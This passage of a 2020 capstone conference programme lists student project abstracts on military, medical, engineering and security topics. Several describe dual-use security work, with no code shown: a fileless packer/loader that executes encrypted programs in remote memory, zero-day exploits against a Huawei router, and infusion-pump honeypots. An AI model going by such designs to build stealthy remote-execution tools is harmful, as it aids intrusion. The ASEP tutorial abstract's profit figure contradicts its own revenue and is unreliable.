SMDC-20: ANDREW P. SAGE MEMORIAL CAPSTONE DESIGN CONFERENCE 2020
PROGRAM FOR MONDAY, APRIL 27TH

View: session overviewtalk overview

09:00-12:00 Session 1A: Design
Chair:
Edward Huang (George Mason University, United States)
09:00
Jacob Murdock (United States Military Academy, United States)
Jason Agsalud (United States Military Academy, United States)
Thai Wright (United States Military Academy, United States)
Elliott Cliborne (United States Military Academy, United States)
B-Kit Management Paradigm Simulation

ABSTRACT. The United States Army’s rotary-wing fleet must undergo comprehensive modernization of Aircraft Survivability Equipment (ASE) to combat emerging threats from advanced generation Man-Portable Air Defense Systems (MANPADS). As the Global War on Terror and conflicts in Iraq and Afghanistan matured, belligerents began employing advanced stage MANPADS in higher volumes, prompting a Joint-Urgent Operational Need Statement (JUONS) directed at modernizing ASE affixed to all legacy fleet airframes. The Army’s current modernization paradigm fields new equipment as soon as it becomes available. This subjects units to frequent maintenance periods, thereby increasing aircraft down-time and reducing unit readiness. A proposed ASE Block Modernization Strategy bundles emerging technologies into suites of components with installation occurring during dedicated blocks of modernization maintenance reducing redundant maintenance actions. The modernization campaign requires installation of a universal modular interface consisting of internal wiring and infrastructure, known as the A-kit. Once A-kits are installed, individual units become responsible for installing the physical sensors, known as B-kits, prior to deployment to training centers or operational assignments. B-kit management is constrained by production rate, quantity available, costs, and available installation windows. This project aimed at developing an optimal B-kit management strategy to manage these constraints and maximize Army Aviation readiness while maintaining minimal impact to operational tempo, training cycles, and unit operations. A discrete event simulation was leveraged to identify an optimal B-kit management plan. The model employed an “as late as possible” logic to template B-kit installation as close to a deployment start date without interfering with a commander’s desired training schedule. The model simulated a range of B-kit installation scenarios templated on each Combat Aviation Brigade’s existing training schedule and evaluated readiness metrics based upon user inputs pertaining to desired pre-deployment “no-touch” training windows. This provided the Department of the Army Military Operations - Aviation (DAMO-AV), the U.S. Army Forces Command (FORSCOM), the Project Management Office for Aircraft Survivability Equipment (PM-ASE), and unit commanders with optimal B-kit installation timelines, personnel requirements, and B-kit supply requirements to maximize unit readiness. The design team validated readiness outputs through logic tracing of the entity flow diagram to ensure the model incorporated the declared specifications provided by the stakeholders. The design team verified the readiness outputs by comparing model data to actual readiness data recorded from ongoing modernization efforts. The model provided policy makers with the tools necessary to reorient ASE modernization doctrine to achieve the personnel staffing, A-kit/B-kit supply, and funding requirements needed to achieve readiness levels required to combat existing and emerging threats and alleviate the existing JUONS.

09:30
Andrew Chapin (George Mason University, United States)
Carl Bai (George Mason University, United States)
Mitchell Palmer (George Mason University, United States)
Andre Herrera (George Mason University, United States)
Hunter Rowlette (George Mason University, United States)
Design of a file-less Deployment for Packer/Loader Systems

ABSTRACT. Our project fulfills a request to produce a software toolkit that allows for remote code execution completely in RAM and file transfer via a service running on a remote host. The goal of our stakeholder, Lockheed Martin Corp. (LM), is for our research to identify a unique way to accomplish this task. The following requirements were provided by LM: (1) the toolkit must be comprised of two separate executables – a “packer” and a “loader”; (2) the “packer” runs locally on Linux, compresses, then encrypts with AES via a user-provided password before sending data to remote hosts; (3) the “loader” runs on a Windows remote host as a service, receives incoming packed data, decrypts/decompresses, and executes any PE files entirely in RAM (i.e. without touching disk). Other loader operating systems were desired. We delivered. A four-part concept of operations was established: (1) a user selects a data block (e.g. executable file) and sends it to the packer where it is packed, (2) the now-packed data is sent over the internet to the remote host, (3) the remote host receives the packed data with the running loader service, (4) the loader decrypts the data block and will either run it in RAM or make it available on the Disk. Specifically, a CLI was built for the packer for user interaction, and a heartbeat process for the loader was designed in order to communicate uptime and availability of remote hosts to the user. Our toolkit, written in C++, implements the desired objectives of our stakeholder. We utilized Libressl, filesystem, miniz, etc. libraries to accomplish the objectives. Finally, quality assurance was established through integration and unit tests of the toolkit. The software was then handed over to LM for confirmation and testing in their environment. Alterations were made as requested and the final product was shipped. This paper provides an in-depth analysis of our product and our research into similar products and methodologies to our solution.

10:00
Arian Amini (George Mason University, United States)
Hamza Abshir (George Mason University, United States)
Sara Elkholy (George Mason University, United States)
Kamilla Quinones Burgos (George Mason University, United States)
Mahmoud Moharrem (George Mason University, United States)
Design of a Tutorial System for the Associate Systems Engineering Professional (ASEP) Exam

ABSTRACT. Hiring Managers at System Engineering companies have to select engineering candidates that will be value-added to the organization now and in the future and avoid costly bad hires. Interviews with Hiring Managers identified that they use Grade Point Average (GPA), work experience (e.g. internships), and skills (e.g. programming languages) to choose candidates for interview. To reduce their risk, they also use Professional Licenses as a discriminator. For entry-level Systems Engineers, the Associate Systems Engineering Professional (ASEP) certificate offered by INCOSE is the appropriate Professional License. To get the ASEP certificate, candidates need to pass a 120 question multiple-choice exam. The knowledge is based on the INCOSE Systems Engineering Handbook which consists of more than 250 pages with more than 4,000 keywords. A passing grade is 70%. Only 60% of the people taking the exam pass. The exam costs $160.

A tutorial system for students taking the exam is needed to minimize the risk of not passing the exam (i.e. guarantee passing the exam), reducing the time to study for the exam, and to make studying the exam an enjoyable experience.

The Concept-of-Operations for the Tutorial System is to assess student’s knowledge with a diagnostic quiz, tailor material for studying from the diagnostic, and evaluate students’ performance with assessment quizzes. The diagnostic avoids studying material the student already knows. The tutorial is self-paced and includes repetition to avoid forgetting.

The Tutorial System was implemented in Google Classroom. There are PDF study guides on the format of “Summarized Contents,” Tests and quizzes in Google Form, a Question Pool and individual Progress Data Sheets. The Google Classroom learning management has undergone verification testing and satisfies the mission and design requirements.

A Validation Test of the Tutorial System was conducted. Sixteen Senior System Engineering students were given a Diagnostic Test on each chapter in the Handbook on Mondays. On Wednesdays they were given tailored learning material. The following Wednesday (i.e. 7 days later) they were tested on the material. For Chapters 1, 2, 3, and 4 the mean for the Diagnostic was 52.9%, 55.9%, 44.1%, 61% with a standard deviation of 37.4%, 30.3%, 34.8%, 17%. For Chapters 1, 2, 3, and 4 the mean for the Assessment was 41.2%, 75.3%, 78.3%, 63% with a standard deviation of 50.7%, 19.7%, 14.5%, 13%. A standard t-test with α = 0.05 indicated statistically significant improvement from Diagnostic to Assessment for Chapters 2 and 3. There was no statistically significant improvement from Diagnostic to Assessment for Chapters 1 and 4. Analysis of the data has generated modifications to the experiment, the diagnostic/assessment quizzes and the material that will be used as the Validation Test continues.

A 5 year projection with 10% market penetration for annual market size of 2250 SE students per year, generates cumulative revenue of $675,000. With non-recurring development and testing cost of $75,205, and recurring maintenance costs of $1281 per year, the 5 year profit is estimated at $3,293,390M. The 5 year ROI is 112.95% and the Break-even is in year 1.

10:30
Twinkle Gera (George Mason Univeristy, United States)
Bawer Alissa (George Mason University, United States)
Amir Itayem (George Mason University, United States)
Adalid Helguero (George Mason University, United States)
Mohammad Saad (George Mason University, United States)
Using Generative Adversarial Networks to Produce Synthetic Overhead Imagery

ABSTRACT. The purpose of this project is to improve the process of tagging data to use for the training of machine learning object detection and classification models. This object detection process can be used in the context of tagging data including keyword tags to organize data efficiently. Two adversarial networks will be built into a Deep Convolutional Generative Adversarial Network (DCGAN), the Generator and the Discriminator. The Generator Network will produce synthetic images and the Discriminator Network will determine the accuracy of those images. A training model will automate this process at the end of the DCGAN architecture. These synthetic images will provide users authentic details in classified areas to gain knowledge or for future programs. After the DCGAN Network goes through it process it will generate which images are real and which ones are fake for the user. The stakeholders of this project are our customer and subject matter expert: Tim Parker and Johnathan Brant

The requirements of this project include creating a Generator Neural Network component that is capable of generating realistic synthetic overhead imagery. During this process the Discriminator will create components to improve the accuracy of the images produced by the Generator. The Discriminator will be responsible for validating the authenticity of those synthetic images. Together these components will produce realistic synthetic overhead imagery. The DCGAN was designed by removing fully connected layers and implementing others layers, such as convolutional, core, and pooling to make up the Generator and Discriminator using Keras Deep Learning library, and Tensorflow as the backend. Using a mini batch gradient descent, the Generator model will be trained by the Discriminator to learn how to create synthetic overhead imagery from satellites. A stable DCGAN will have a loss curve for both the Discriminator and Generator, which will start high and progressively decrease over each epoch. At the end of each epoch, the system will print the loss of both models on to the console. The purpose of this is to monitor the loss and terminate the process if the training becomes unstable. The method of validating the DCGAN is qualitative since the images produced by it will determine if they look realistic enough. The end goal is to be able to produce synthetic images with a stable DCGAN that are similar to the testing dataset.

 

11:00
Adel Youssef (George Mason University (SEOR), United States)
Faris Masri (George Mason University (SEOR), United States)
Lucciana Remy (George Mason University (SEOR), United States)
Murat Gokturk (George Mason University (SEOR), United States)
GMU Dynamic Low Visibility Pneumatic Cofferdam

ABSTRACT. Communities across the United States are experiencing a rise in nuisance flooding events. These flooding events cause financial distress on community members and these events are expected to increase in frequency by over 200% the next two decades. Businesses are experiencing an increase in store closures, property damages, and losing consumer visits. Homeowners are experiencing property and asset damages associated with flooding. Communities are experiencing a decline in tourism and are at risk of permanently damaging existing buildings and infrastructure.

There is a need for a more effective solution to protect communities from nuisance flood events. Current available solutions are expensive, have difficult assembly and deployment processes, are temporary, and occupy a lot of space when not in use. Our group has designed and developed a solution that addresses these issues, is cheaper, and has a higher cost-utility to its competitors. The GMU pneumatic cofferdam system is designed to be permanently built around a location’s perimeter where the desired flood protection is to take place and can be deployed by a single operator. This system would eliminate storage costs that other alternatives require and provides a sleek and lightweight design which will increase ease of use and decrease maintenance costs.

The cofferdam system must be easily deployable by an operator, must be cost-effective, and effectively protect against flooding up to the height of the dam wall. The cofferdam must also serve as a usable and visually appealing space when not deployed. A test facility was designed and constructed to test three different prototype configurations. Upon the successful completion of a conceptual design, the first prototype design was finalized to specified parameters and built. Following the build of the first prototype and test environment, a series of tests were performed to measure strength, deployment, and leakage, starting with structural integrity tests of the test environment. With leaking at the pneumatic airbag boundary as the primary design flaw, two of the configurations were found to have significant bottom sealing problems, which scale with the entire length of the cofferdam. The third prototype design alternative improved flood mitigation testing results. A comparative analysis on different materials was conducted, and a final prototype design was agreed upon. The finalized prototype designs and final report have been sent to George Mason University’s patent office for patent processing. Finally, a business use case has been developed for deploying the GMU pneumatic cofferdam system in a location experiencing frequent flooding events, as well as a trade-off analysis of the final cofferdam system design against market competitors.

09:00-12:00 Session 1B: Device Security
Chair:
Paulo Costa (George Mason University, United States)
09:00
Peyton Edmondson (George Mason University, United States)
Fletcher Davis (George Mason University, United States)
Austin Griffith (George Mason University, United States)
Austin Harlow (George Mason University, United States)
Clifford Krey (George Mason University, United States)
Vulnerability Research Workflow and Finding Zero-Day Vulnerabilities

ABSTRACT. Technology companies rely on the trust of their customers in order to prosper and grow. Devices are expected to perform as intended, be robust against potential attacks, and ensure the privacy of personal information from the manufacturing company. The authors of this paper, under the direction of Lockheed Martin Corporation, developed a methodology for putting this trust to the test, performing vulnerability research on a Huawei HG8245H router. Huawei is one of the largest telecommunications equipment manufacturers in the world and with that comes an expected reputation of trust. However, this trust is already in question. Because of security issues in the past, Huawei is banned from bidding on United States government contracts. In addition, the U.S. government and U.S. contractors are not allowed to use Huawei devices. To address this concern, a vulnerability research workflow was implemented to perform research, analysis, and testing to find possible vulnerabilities and exploits on the Huawei HG8245H router. This workflow leverages free, open-source software, along with hardware devices, such as Jtagulator and Bus Pirate. The intent was to find vulnerabilities that had not been previously disclosed and five zero-day vulnerabilities were successfully exploited. Also, evidence of 333 potential buffer overflow vulnerabilities along with poor coding practices when examining the source code of commands and services within the router were found. All suspected vulnerabilities were tested and validated with proof of concept code and were documented in bug-bounty style reports. The workflow is designed to be repeatable against similar platforms and using a variety of tools and software -- not just the ones leveraged during this project. In this paper, we will outline the vulnerability research workflow along with the methods used to find, confirm, and document each vulnerability.

09:30
Felicia Ip (George Mason University, United States)
De’shauna Downs (George Mason University, United States)
Nick Gould (George Mason University, United States)
Sumeet Ramani (George Mason University, United States)
Weapon Systems Cyber Protection

ABSTRACT. Modern weapon systems, software and data communication systems are inherently vulnerable to many different attack techniques due to the lack of cybersecurity prioritization. Until recently, cybersecurity has been non-existent or has been used as a “bolt-on” solution. Critical weapon systems have a higher impact if compromised, so it is imperative that these systems are protected. Our stakeholders include the United States government contractors, military, law enforcement, etc. Our system shall be used to help protect weapon systems from cyber attacks and ensure system resilience. Our project will utilize a raspberry pi that will transmit sensor data to be a representation of a weapon system by allowing us to understand the systematic architecture, demonstrate how to secure weapons and its data while using object and facial recognition. In the initial phase of our project, we have created a backlog of system tasks and capabilities. Within our backlog, we explicitly categorize our tasks as either process or product, where we focus perfecting all of the process tasks first. We developed a ConOps to describe our system from deploying and maintaining the devices through the lifecycle of the weapon’s system from the viewpoint of an individual who will be using the system. Our sponsor, Northrop Grumman, has required us to maintain a backlog of system tasks, capabilities, architectural diagrams, and key system information as well as completing new tasks in sprints. During this phase, we determined the best approach for our system through research of the different components such as hardware and software requirements. We then outline the approach to creating a small factor, low power, environmentally resilient network protection device. For our system, we have two raspberry pi’s represented as an AWS EC2 instance and physical development lab, serving as inflight and as a ground station. Our grounded pi is configured and maintained while the software from the development labs flow onto the pi or “weapon system” once it is “deployed”. The inflight pi produces the data and sends it back to the development labs to be further analyzed by AWS Rekognition. Based on the data, an action will trigger upon the existence of particular factors/objects. Through designing our solution, we verified our work by ensuring that we followed through with cyber security best practices such as identity and access management, secure coding practices, and security configurations on our device and platform. We also ensured that our customer’s expected deliverables were met. In order to validate that our solution meets requirements, it is necessary to demo points-of-entry by conducting vulnerability assessments and penetration testing to test our resilient system.

10:00
Salma Almaz (George Mason University, United States)
Randy Maysaud (George Mason University, United States)
David Nguyen (George Mason University, United States)
Ronan Roque (George Mason University, United States)
Anthony Tate (George Mason University, United States)
Baxter Sigma Spectrum Infusion Pump Honeypot

ABSTRACT. The use of biomedical devices is of paramount importance to the healthcare industry as they help doctors and nurses to better serve their patients. As technology progressed, these devices became much more interconnected with each other to allow a single person to wirelessly manage a fleet of devices through one management terminal. Such devices include infusion pumps, which are used to administer fluids into a patient in a controlled manner. While biomedical device manufacturers have focused on the usability and safety of these devices, they have put little consideration into the cyber and physical security of these systems. Considering that malicious manipulation of biomedical devices can be life threatening, security needs to be one of the main goals of manufacturers. With the increase of threats to healthcare systems and their biomedical devices, it is important to create a way to mitigate these vulnerabilities and eliminate the risk.

One form of defense implemented by various security teams are honeypots. Honeypots are traps deployed to attract attackers away from legitimate systems. Honeypots can also be configured to log attacker actions in order to inform security personnel of what malicious events are occuring. Our team was tasked by INOVA to create a honeypot for a biomedical device. The device of choice was the Baxter SIGMA Infusion Pump. This infusion pump has many vulnerabilities such as weak authentication and hardcoded passwords. In order to address these issues and find newer vulnerabilities, we created a virtual honeypot. We created a virtual honeypot by utilizing a Raspberry Pi which is a very small computer that can be plugged into a computer monitor or a TV screen. The Raspberry Pi is placed as a server on the network that has software to deploy the virtual honeypots and the log system. The Raspberry Pi is placed in the same network that the Baxter SIGMA Infusion Pump servers are in. These virtual honeypots are then used to misdirect malicious users into accessing the virtual honeypot instead of the legitimate infusion pump. The Raspberry Pi also has an intrusion detection system (IDS), that can alert the security officers when an attacker has accessed or has attempted to access the virtual honeypots. Once the virtual honeypot is actively running, it should be monitored by a security officer for any intrusions. Each intrusion that is detected will be logged by the virtual honeypot and sent to the Raspberry Pi. The logged information will be stored on the Raspberry Pi and then extracted into a readable file that is then sent to the security risk management team for further analysis. The readable file contains the following information to provide explicit details: a timestamp of when the attack occurred; information on the source of a malicious actor’s connection such as IP addresses or MAC addresses; a log file detailing all inputs commands entered by the malicious actor; names of files or directories created, modified, or deleted; names of user accounts or group accounts used or accessed during the attack; and if applicable, a list of any files uploaded or downloaded along with their respective hashes.

The stakeholders to this project are the virtual honeypot developing team, the INOVA team, and the attackers. The development team needs to configure a Raspberry Pi to be placed on the INOVA network. The INOVA team will need to ensure that they have an IDS in place prior to placing the Raspberry Pi on their network. By doing so, the INOVA security team will be able to continuously monitor the legitimate infusion pumps on the network, as well as the virtual honeypot. The attackers will be actively sniffing for any vulnerabilities or open ports that seem legitimate. Many attackers are aware of honeypots, therefore if the honeypot isn't correctly configured to mimic the infusion pump, the attacker will avoid accessing the honeypot and the data gathered will be limited.

In order to verify that the proposed Raspberry Pi and virtual honeypots are fully functional and capable of detecting intrusions, we will be deploying the virtual honeypots in a closed network, and to attempt to attack the honeypots using the most common attack techniques seen. We pinged the virtual honeypot, used a Brute Force attack technique, and verified that reports have been successfully generated. By emulating those attacks from an outside source onto our device, we’ve verified that the Raspberry Pi can deploy the virtual honeypot, detect intrusions, and gather information on the attack done to the system. After the completion of the project, the solution will be handed over to INOVA along with various documentation such as an installation manual and an operation manual

10:30
Christopher LaManna (Northrop Grumman, United States)
Sanila Tabassum (Northrop Grumman, United States)
Manav Shah (Northrop Grumman, United States)
Ratan Nambiar (Northrop Grumman, United States)
Weapon Systems Cyber Protection

ABSTRACT. Weapons systems not only depend on hardware, but also on software to function effectively and properly. The software capabilities being used in various weapons systems are often exposed and vulnerable to different types of attacks. Our approach to this problem is to configure a single board computer that can protect the system from all different types of attacks. The stakeholder for this project is Northrop Grumman, one of the largest defense contractors in the nation. To describe the concept of operations, the user of the single board computer should be able to connect the device directly to a system and be able to use the resources provided by the single board computer to secure the system network. In addition, the device should be operable by a user in a remote location such as a central command center, as well as by a user controlling the weapons system. The main requirements for this project, as stated by the stakeholder, include developing the system according to industry cybersecurity standards, providing a comparison of our product to those industry cybersecurity standards, using a compact, single board computer in the design, and ensuring that the protection device will fully integrate with any given weapons systems. We must also outline how the system will be resilient to a variety of attacks from adversaries as well as cyber incidents. In addition to that, we must also consider network limitations and environmental challenges in the design. In designing the device, we chose to use the Raspberry Pi as the single board computer. We are configuring it with a virtual private network, firewall, intrusion detection system, and a Linux operating system. All software used in the design is open source. The selected hardware limits our choice of software due to hardware and software compatibility issues. In order to implement the project, the single board computer will be attached to a test network that will simulate a weapons systems network. To verify and validate that the system works, we will be performing penetration tests against the device on the test network. Additionally, we will conduct network analysis and ensure compliance with the NIST Cyber Security Framework, NIST 800-160, and other applicable standards. Lastly, our business plan for this project would be for Northrop Grumman to acquire our product and implement it in their existing solutions.

11:00
Rahma Moalin Mohamed (George Mason University, United States)
Prayatna Timalsina (George Mason University, United States)
Mattias Duffy (George Mason University, United States)
Connection Resilient Bodycam with Built-In Non-Repudiation and Verification Features

ABSTRACT. Police Body-worn cameras (BWCs) have been an important addition to the police toolkit and have been shown to resolve cases faster, reduce paperwork, and make citizens feel safer. Despite these benefits, body camera technology is quite outdated as an officer still chooses what to record and what to submit for evidence. Only one copy of the footage exists, with the officer choosing what to record and what to submit for evidence. This evidence could either be destroyed before submission by an attacker or not recorded in the first place by a negligent officer. In order to ensure validity, integrity of video and provide non-repudiation of an officer's actions, we propose a solution that provides these services just by using a smart phone.

09:00-12:00 Session 1C: Healthcare
Chair:
Andy Loerch (George Mason University, United States)
09:00
Trevor Parker (United States Military Academy, United States)
Taylor Andrews (United States Military Academy, United States)
James Dorko (United States Military Academy, United States)
Rex Scott (United States Military Academy, United States)
David Hughes (United States Military Academy, United States)
Evaluating the Impact of Soldier Load on Mobility, Lethality, and Survivability

ABSTRACT. Today’s Army requires physically fit Soldiers that are mobile, lethal, and survivable. However, as technology continues to advance, the Army attempts to increase soldiers’ capabilities with additional equipment. These additional capabilities come at the cost of additional weight, which we believe makes the soldier less mobile and therefore less effective in terms of lethality and survivability. Our research attempts to quantify this trade space between mobility, lethality, and survivability. Our research is comprised of three efforts: quantifying mobility, measuring the impact of load on mobility and lethality, and simulating mobility’s effect on the survivability of a soldier. For the first effort, quantifying mobility, we use West Point’s Indoor Obstacle Course Test (IOCT) as a proxy for mobility because it simulates many movements that would be expected of a soldier in combat such as a low crawl, jumping over small walls, climbing over high walls, crossing a balance beam, and jumping through a window. We then look at data available in the Army such as the Army Physical Fitness Test (APFT) and the new Army Combat Fitness Test (ACFT) to create a linear regression model that predicts a soldier’s mobility. Second, our research analyzes mobility and lethality through a controlled experiment where participants negotiate a mobility course followed by a shooting test on a simulated range. This controlled study sent 42 voluntary participants through an obstacle course: once without additional weight, and once with approximately 35% of the participant’s body weight in additional load. Surprisingly, the additional load had no significant effect on either the number of targets hit or the precision of the soldier’s shot group. However, there is data to support that loaded soldiers took longer to engage their target, which could indicate a squad of heavily loaded soldiers would be less lethal and survivable. The study also helped quantify the decrease in mobility of soldiers. Soldiers under load, on average, took twice as long to navigate the first four obstacles and took 60% longer to complete the entire mobility course. This decrease in mobility leaves them exposed to enemy fire for longer periods of time when moving to different forms of cover. Finally, we use mobility scores from our controlled study to model the tradeoff between mobility and survivability via the Infantry Warrior Simulation (IWARS). IWARS helps explore how different sets of protective armor affect the overall mobility speed and likelihood of survival, for a squad-sized infantry element using stochastic modeling. We develop two IWARS scenarios: one in an urban terrain setting and one in an open terrain setting. We then run four different squad configurations with varying levels of mobility and protection in order to see the effect mobility has on survivability. Overall, our research helps quantify mobility through linear regression models, analyzes the effect of increased load on a soldier’s lethality and mobility through a controlled study, and simulates the effect of decreased mobility on a soldier’s survivability using IWARS.

09:30
Miranda Eveker (George Mason University, United States)
Evan Simon (George Mason University, United States)
Jared Benedict (George Mason University, United States)
Elizabeth McPherson (George Mason University, United States)
Biomedical Honeypot Device

ABSTRACT. For our senior design project INOVA has requested we create a biomedical honeypot to collect information for information security analysis. This honeypot device is designed to attract threat actors in order to understand their tactics, techniques, and procedures used when attacking the device. The device, once complete, will then be placed on the hospital network in a vulnerable state to assist INOVA in collecting the data required to further secure these devices and their network. We are working on the Baxter Sigma Spectrum Infusion Pump, which is currently being used in the hospital. Stakeholders that are involved in this project include INOVA, the patients that require an insulin pump, and because these devices connect to the hospital network, we include all other devices and people being treated in the hospital. Our concept of operations includes the following four step process. 1. The INOVA IT employee will get the device and set it up on their guest network. 2. Then an attacker will connect to the guest network and see the “biomedical device” vulnerable on the network. 3. The attacker then gets into the device and starts collecting/ modifying data, altering logs and device functionality, possibly moving elsewhere on the network, etc. 4. An INOVA Cyber employee will either monitor the device throughout the day or check the logs regularly to see how the attackers acquired access, what data they accessed, and any actions they performed. For the requirements, we have a total of six shown below. 1. The group shall provide the customer 1.1 Organization Charts and Qualifications 1.2 Work breakdown structure 1.3 Project Schedule 1.4 Project Cost 1.5 Weekly projected applied hours graph and estimated non-labor cost 1.6 A honeypot to monitor attack methods Our current design of this honey pot device includes two virtual machines (VM’s) linked together, the first being the honeypot itself mimicking the insulin pump, and the second being a logging server to monitor the honeypot and collect the required data. Our alternative designs were to have both of these virtual machines instead be raspberry pi's, but because of the constraints of the operating systems we were unable to move forward with that. As far as implementation this simply consists of us setting up these virtual machines on the hospitals network. To verify this works requires us to run our attacking script on the device and see how the logging VM collects that data and alerts the INOVA employees. For validating the test, we assume that because the device is as vulnerable as possible, we can have the “attacker” already be inside the machine. This means that our script that would run on the device is a valid test to show the logging server collects and alerts the data to INOVA as required. Due to the nature of this project we have no further business plans when this is complete.

10:00
Carlie Bolling (University of Pennsylvania Student, United States)
Chris Foley (University of Pennsylvania Student, United States)
David Guardiola (University of Pennsylvania Student, United States)
Gabriel Smith (University of Pennsylvania Student, United States)
Katrina Pham (University of Pennsylvania Student, United States)
Ver Corrective Software for Strabismus Treatment

ABSTRACT. Affecting 4% of the U.S. population, strabismus, commonly known as crossed eyes, results in blurry vision, double vision, eye strain, headaches, and a loss of binocular vision. In severe cases, or left untreated, strabismus can transition to ‘lazy eye’, which is the brain’s adaptation of ignoring signals from the affected eye. Current treatments include eye patch therapy and surgery, which can be painful, impose financial burden, and fall short of effectively treating the condition (Birch, 2012).

Ver offers a therapeutic treatment option for strabismus patients. Virtual reality (VR) technology is currently utilized in other ocular therapies, but this technology has not been applied to strabismus. Our software restores binocular vision to the user by utilizing their desired focal point and translating the image appropriately to the strabismus-affected eye on the OLED screen. The desired focal point is acquired through the eye-tracking capabilities of the Vive Pro Eye VR system. This system was chosen based on its ability to track both eyes independently instead of solely aggregating the approximate eye data.

Created by an undergraduate team of systems, electrical, and computer engineering students at the University of Pennsylvania, the corrective software is built in Unity, and proof-of concept data has shown this solution can improve strabismic patients’ vision. Current work involves further validation testing with hardware integration. Future instantiations of the design will require GPU based computation rather than the current CPU based computation to allow the software to run with a processing latency under 30 milliseconds. This design limitation is due to project constraints concerning the ownership of the GPU API for the hardware system and the University of Pennsylvania’s senior design budget.

Strabismus surgery costs $8,000 on average with insurance, which does not include the after care and necessary follow-up appointments (Sarantakos, 2019). Eye patch therapy costs vary depending on the rigor of the schedule and whether vision-impending drops are required for the dominant eye. Other home VR optical training device packages charge $8,000 and are not designed for strabismus correction nor are always ophthalmologist recommended (Virtual Reality, n.d.). Due to inadequate and expensive treatment options for strabismus patients, there is an apparent need in the market with established opportunity for adoption and success within the therapeutic field.

The future development of this product would allow ophthalmologists to administer the therapy in-office by tuning a correction parameter to increase the involvement of the non-dominant eye. Overtime, this correction parameter would be decreased as the muscles in the affected, weak eye become stronger and develop, treating strabismus through a less painful patient process.

10:30
Mallory Jones (George Mason University, United States)
Misbah Abdul-Khadir (George Mason University, United States)
Ethan Farmer (George Mason University, United States)
Varun Kripanandan (George Mason University, United States)
Sprint Performance Training System

ABSTRACT. Running sounds simple, but it’s a complex biomechanical process impacted by a number of factors. Since races are completed in about ten seconds, it’s difficult for coaches to see differences in biomechanics to recommend improvements. The only data available to sprinters and coaches are their end race times. These bottlenecks decrease the quality of sprinting and coaching and delay improvement of race times. There’s a need for data on races to increase coaches’ knowledge of what’s happening during their athletes’ sprints. Data includes acceleration, velocity, maximum velocity, stride length and frequency. The Sprint Performance Training System addresses these problems at the high school and college levels. The concept of operations for the sprinting season begins with the athlete establishing a baseline sprint that the coach uses to create a training plan. After the athlete trains and competes, the coach updates the training plan and makes subjective recommendations. The device aids the coaching and sprinting processes by providing velocity graphs, phases, and stride frequencies of the races which the coach can use to make objective recommendations, identify corrections, and update training plans. Requirements define the accuracy and reliability of the device that includes a clock, Inertial Measurement Unit, and Global Positioning System receiver, and a Secure Digital (SD) storage card to record the sprinter’s acceleration, position, and time. It analyzes this data to output velocity/ stride length and frequency/ maximum velocity and displays this data on various graphs. Three verification tests have been completed. A drop test was conducted to verify the accuracy of the IMU sensor by dropping the device 1.5 meters five times and taking videos of each drop to be analyzed in Tracker. The actual average acceleration and terminal velocity were measured to be 9.07 m/s² and 4.59 m/s respectively, compared to the theoretical values of 9.8 m/s2 and 3.14 m/s. This test will be repeated with an increase in sample rate from the sensor. A surveyed position test was conducted on a NCAA track to verify GPS accuracy. The GPS device recorded latitude and longitude one hour in two locations 100 meters apart on the track. The distributions at both locations were obtained and the mean error found was 3.5 meters with standard deviation of 4.91 meters. The verification test for a sprint was conducted with a surrogate sensor until the GPS/IMU device is available. The difference between the velocity of the surrogate sensor and the velocity obtained from Tracker analyzed videos over 20 meters segments ranged from 9% to 35%. Changes to the verification test will be made for the next test. The device is projected to be sold for $100/ unit with anticipated profit of $35/ unit. It will be sold by brick and mortar vendors, online, and to athletic programs. Sales are assumed to grow slowly and start to level off at around 10% of the targeted market of 231,000 athletes in 5 years. The ROI is 49.98% and the Break-Even point is 1.18 years into production.

11:00
Ryan Chan (TWSS, United States)
Alexander Danchak (TWSS, United States)
Richa Malhotra (TWSS, United States)
Enhanced Amber Alerting System

ABSTRACT. Tracking software has been applied to a wide variety of problems such as locating lost individuals or pets. Most trackers today tend to rely on the Global Positioning System (GPS) for geolocation data of real-time positions. However, GPS has two main limitations; limited signal reception and limited battery life. With these two limitations, GPS is not a viable solution for locating lost or kidnapped children, pets, people with Alzheimer’s or other lost individuals. TWSS intends to avoid the limitations of GPS through the creation of a tracking application system that uses Bluetooth crowdsourcing. This tracking application system will trilaterate Bluetooth beacons worn by individuals. TWSS’s system would allow for tracking that does not rely entirely on GPS. Rather, TWSS’ system would use crowdsourced location data from a network of smartphones running TWSS’ applications.

The GMU team has developed this tracking application system starting with the Bluetooth sensor. This device was developed to send out TWSS specific Bluetooth beacons that can be received by a network of smartphones that are trying to locate its position. These smartphones are running a background application, also known as the parasite application, that are capable of filtering through Bluetooth traffic for TWSS Bluetooth beacons. Once a background application receives a TWSS Bluetooth beacon, the smartphone will proceed to send out location data needed to locate the Bluetooth sensor to a server via an API. Using the information provided by the network of background applications, the server will pull necessary information from the database as input to the team’s geolocation algorithm. Once the location of the sensor is located, it will be outputted to a parent application that will display the location on a map to help the user find the missing individual or pet the sensor is attached to.

09:00-12:00 Session 1D: Network Security
Chair:
Rock Sabetto (George Mason University, United States)
09:00
Malay Patel (George Mason University, United States)
Kelvin Nguyen (George Mason University, United States)
Harsimran Ruprai (George Mason University, United States)
Justin Luu (George Mason University, United States)
Akshith Bandam (George Mason University, United States)
Automated Web Proxy-Data Leakage Analysis

ABSTRACT. Insider threats are one of the most difficult aspects to address in the field of cyber security. Small businesses struggle to detect insider threat activities within their organizations due to the lack of automation in collecting and analyzing web proxy data. This analysis of log data currently requires manual collection and examination by human analysts, which increases inefficiency. This inefficiency is caused by exhaustive efforts to analyze the proxy logs line by line each day, which results in an inaccurate assessment of the data. Sponsored by Verizon, the team was requested to develop an automated alternative for the manual log analysis process to detect insider threats. To meet Verizon’s need, this project first provides an automated process of collecting the Apache web proxy data. This project further provides the capability to distinguish between malicious and non-malicious activities based on the insider threat criteria defined by the team. This developed tool is delivered as a web-based application. This web-based application will be hosted in the AWS cloud for the purposes of achieving reliability and flexibility. This web application utilizes AWS instances that host the web proxy, database, and webserver. For the web proxy, the Perl script parses the Apache web proxy logs, and the Bash script automates the collection and transfer of the logs to the database on a routine basis. For the database, NoSQL MongoDB stores the transferred proxy log data. For the webserver, Node.js and React.js help to develop the web Graphical User Interface (GUI). The end users pass through the company’s proxy server prior to accessing the Internet, which is part of the proxy log collection. Once authenticated, security analysts can access the GUI via a web browser to analyze the web proxy data. Based on pre-packaged rules selected by the analysts, the database can be queried to return the log data. The analysts can use the results to predict potential insider threats within the organization. These results are evaluated using a team-generated risk scoring metric that provides a score for each host based on predetermined insider threat parameters. In order to verify the tool works as designed, a large set of dummy web proxy logs are created to emulate realistic proxy logs generated within a small business environment. This set contains proxy logs with thirty distinct users, spread 